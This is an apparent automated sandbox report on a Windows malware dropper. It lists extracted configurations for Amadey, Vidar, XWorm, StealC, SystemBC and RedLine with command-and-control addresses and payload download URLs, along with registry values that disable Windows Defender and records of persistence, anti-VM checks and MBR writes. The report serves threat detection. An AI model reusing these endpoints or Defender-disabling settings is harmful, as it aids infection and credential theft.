Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-02-2025 05:37
Static task
static1
Behavioral task
behavioral1
Sample
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe
Resource
win10v2004-20250217-en
General
-
Target
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe
-
Size
2.0MB
-
MD5
2341120afd619b888c8316c0a91d39b8
-
SHA1
a20ac1ddd4110ea8a3e7732c8b49ab84df004ce7
-
SHA256
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b
-
SHA512
89cefe006dbd385374fb4feee4b32b944bacee34ae160404ab3516ab12bded8c976699d76290fbc9dd911ba9bfa0c906b944a68d06baad25fc1529cc3a204d0b
-
SSDEEP
49152:LAHg7O11+U6WgTQv6Rw/HUtUXYeimDSD4ro:sHYO14UuQv6KHzj7E
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
xworm
5.0
45.154.98.175:7000
0HzpJoisb4u9PgIO
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
redline
cheat
103.84.89.222:33791
Signatures
-
Amadey family
-
Detect Vidar Stealer 16 IoCs
resource yara_rule behavioral1/memory/2032-173-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-170-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-168-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-166-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-175-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-286-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-307-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-327-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-356-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-412-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-463-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-481-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-533-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-553-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-557-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2032-589-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x00090000000191f7-238.dat family_xworm behavioral1/memory/2292-265-0x0000000000DD0000-0x0000000000DE0000-memory.dmp family_xworm behavioral1/memory/2516-483-0x00000000009C0000-0x00000000009D0000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/2488-1377-0x00000000009E0000-0x0000000000E4C000-memory.dmp healer behavioral1/memory/2488-1378-0x00000000009E0000-0x0000000000E4C000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/936-1658-0x0000000000A10000-0x0000000000E88000-memory.dmp family_sectoprat behavioral1/memory/936-1659-0x0000000000A10000-0x0000000000E88000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 25 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ gmsbuho.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4c71e9f822.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3e5895c6d6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b463df2a29.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bovjd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a871065581.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a1ba79af20.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dd0f37a968.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2266dcdb00.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3b959cc017.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ gmsbuho.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4536f7f1c3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8f4c900399.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 96cd7a6a36.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 128 1960 powershell.exe 134 2820 powershell.exe 244 2124 powershell.exe -
pid Process 1460 powershell.exe 2152 powershell.exe 2124 powershell.exe 2060 powershell.exe 1960 powershell.exe 2820 powershell.exe 2124 powershell.exe -
Downloads MZ/PE file 31 IoCs
flow pid Process 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 5 2024 skotes.exe 225 1556 BitLockerToGo.exe 128 1960 powershell.exe 244 2124 powershell.exe 299 4016 BitLockerToGo.exe 46 2024 skotes.exe 46 2024 skotes.exe 46 2024 skotes.exe 46 2024 skotes.exe 245 3772 BitLockerToGo.exe 98 2344 futors.exe 130 2344 futors.exe 134 2820 powershell.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1472 chrome.exe 3064 chrome.exe 2160 chrome.exe 2408 chrome.exe -
Checks BIOS information in registry 2 TTPs 50 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a871065581.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dd0f37a968.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3b959cc017.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 96cd7a6a36.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gmsbuho.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3b959cc017.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b463df2a29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bovjd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2266dcdb00.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a1ba79af20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8f4c900399.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8f4c900399.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3e5895c6d6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 96cd7a6a36.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bovjd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gmsbuho.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gmsbuho.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dd0f37a968.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b463df2a29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2266dcdb00.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4536f7f1c3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4c71e9f822.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4c71e9f822.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3e5895c6d6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gmsbuho.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a871065581.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4536f7f1c3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a1ba79af20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe -
Executes dropped EXE 49 IoCs
pid Process 2024 skotes.exe 1248 Ta3ZyUR.exe 2884 Ta3ZyUR.exe 2312 qFqSpAp.exe 1532 m5UP2Yj.exe 880 7aencsM.exe 2032 7aencsM.exe 2292 C3hYpvm.exe 2840 oVpNTUm.exe 2516 C3hYpvm.exe 2312 3omTNLZ.exe 680 amnew.exe 2344 futors.exe 1940 Bjkm5hE.exe 1952 Bjkm5hE.exe 2120 qFqSpAp.exe 1732 bovjd.exe 2132 oVpNTUm.exe 2392 DTQCxXZ.exe 2648 7aencsM.exe 1988 7aencsM.exe 2440 3omTNLZ.exe 2540 gmsbuho.exe 700 monthdragon.exe 1788 monthdragon.exe 1600 d2YQIJa.exe 2676 Ta3ZyUR.exe 2888 Ta3ZyUR.exe 2948 dc86b89870.exe 2488 TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE 2336 2266dcdb00.exe 1236 2266dcdb00.exe 2172 483d2fa8a0d53818306efeb32d3.exe 2484 a871065581.exe 3388 4536f7f1c3.exe 4020 a1ba79af20.exe 936 4c71e9f822.exe 3748 8f4c900399.exe 3960 3e5895c6d6.exe 2336 dd0f37a968.exe 3112 b463df2a29.exe 2268 eaa92bd248.exe 2140 50f96f9f6a.exe 2640 TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE 3960 3b959cc017.exe 1800 96cd7a6a36.exe 2132 57eec1646c.exe 1804 gmsbuho.exe 2348 c5845c87f3.exe -
Identifies Wine through registry keys 2 TTPs 25 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine m5UP2Yj.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine a871065581.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 4c71e9f822.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine gmsbuho.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 96cd7a6a36.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine bovjd.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 2266dcdb00.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 4536f7f1c3.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine dd0f37a968.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 3b959cc017.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine gmsbuho.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine a1ba79af20.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 8f4c900399.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 3e5895c6d6.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine b463df2a29.exe -
Loads dropped DLL 64 IoCs
pid Process 2392 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 2392 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 2024 skotes.exe 1248 Ta3ZyUR.exe 624 WerFault.exe 624 WerFault.exe 624 WerFault.exe 624 WerFault.exe 624 WerFault.exe 2024 skotes.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2024 skotes.exe 2024 skotes.exe 880 7aencsM.exe 2568 WerFault.exe 2568 WerFault.exe 2568 WerFault.exe 2568 WerFault.exe 2568 WerFault.exe 2024 skotes.exe 316 WerFault.exe 316 WerFault.exe 316 WerFault.exe 2024 skotes.exe 2024 skotes.exe 2024 skotes.exe 2024 skotes.exe 2024 skotes.exe 2024 skotes.exe 680 amnew.exe 2024 skotes.exe 2024 skotes.exe 1940 Bjkm5hE.exe 1892 WerFault.exe 1892 WerFault.exe 1892 WerFault.exe 2024 skotes.exe 2568 WerFault.exe 2568 WerFault.exe 2568 WerFault.exe 2568 WerFault.exe 2568 WerFault.exe 2024 skotes.exe 2024 skotes.exe 2024 skotes.exe 2024 skotes.exe 2024 skotes.exe 2648 7aencsM.exe 292 WerFault.exe 292 WerFault.exe 292 WerFault.exe 292 WerFault.exe 292 WerFault.exe 2024 skotes.exe 2024 skotes.exe 2344 futors.exe 2344 futors.exe 700 monthdragon.exe 2232 WerFault.exe 2232 WerFault.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086934021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\2266dcdb00.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008220101\\2266dcdb00.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\dd0f37a968.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086950001\\dd0f37a968.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\50f96f9f6a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086953001\\50f96f9f6a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C3hYpvm.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\a871065581.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008230101\\a871065581.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\b463df2a29.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086951001\\b463df2a29.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\eaa92bd248.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086952001\\eaa92bd248.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\dc86b89870.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086933101\\dc86b89870.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 96cd7a6a36.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000700000001a4bc-1282.dat autoit_exe behavioral1/files/0x000600000001a4e8-1395.dat autoit_exe behavioral1/files/0x000b00000001c8d4-2049.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs
pid Process 2392 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 2024 skotes.exe 1532 m5UP2Yj.exe 2840 oVpNTUm.exe 2312 3omTNLZ.exe 1732 bovjd.exe 2132 oVpNTUm.exe 2440 3omTNLZ.exe 2540 gmsbuho.exe 1600 d2YQIJa.exe 2488 TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE 1236 2266dcdb00.exe 2172 483d2fa8a0d53818306efeb32d3.exe 2484 a871065581.exe 3388 4536f7f1c3.exe 4020 a1ba79af20.exe 936 4c71e9f822.exe 3748 8f4c900399.exe 3960 3e5895c6d6.exe 2336 dd0f37a968.exe 3112 b463df2a29.exe 2640 TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE 3960 3b959cc017.exe 1800 96cd7a6a36.exe 1804 gmsbuho.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 1248 set thread context of 2884 1248 Ta3ZyUR.exe 33 PID 880 set thread context of 2032 880 7aencsM.exe 40 PID 1940 set thread context of 1952 1940 Bjkm5hE.exe 66 PID 2648 set thread context of 1988 2648 7aencsM.exe 80 PID 700 set thread context of 1788 700 monthdragon.exe 86 PID 2676 set thread context of 2888 2676 Ta3ZyUR.exe 90 PID 1236 set thread context of 1556 1236 2266dcdb00.exe 140 PID 2484 set thread context of 3772 2484 a871065581.exe 141 PID 3388 set thread context of 4016 3388 4536f7f1c3.exe 146 -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\bovjd.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\bovjd.job oVpNTUm.exe File created C:\Windows\Tasks\gmsbuho.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\gmsbuho.job oVpNTUm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 10 IoCs
